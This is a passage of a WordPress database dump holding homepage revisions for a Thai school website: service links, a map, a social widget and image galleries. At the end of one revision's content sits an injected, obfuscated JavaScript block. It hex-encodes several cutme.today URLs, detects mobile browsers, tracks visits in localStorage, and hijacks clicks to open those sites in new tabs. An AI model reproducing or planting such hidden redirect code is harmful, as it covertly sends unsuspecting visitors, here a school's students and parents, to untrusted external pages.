class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 14:41:20','2025-09-11 07:41:20','',14,'http://pakhaeng.ssk.in.th/?p=2040',0,'revision','',0),
(2042,1,'2025-09-11 14:41:56','2025-09-11 07:41:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"9f7ee323\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1e35ff-0d\",\"ids\":[2026,2039],\"type\":\"slider\",\"imageRatio\":\"inherit\",\"imagesDynamic\":[{\"id\":2026,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2026\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1024x410.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"width\":1024,\"height\":410},{\"id\":2039,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2039\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-1024x512.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"width\":750,\"height\":375}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรี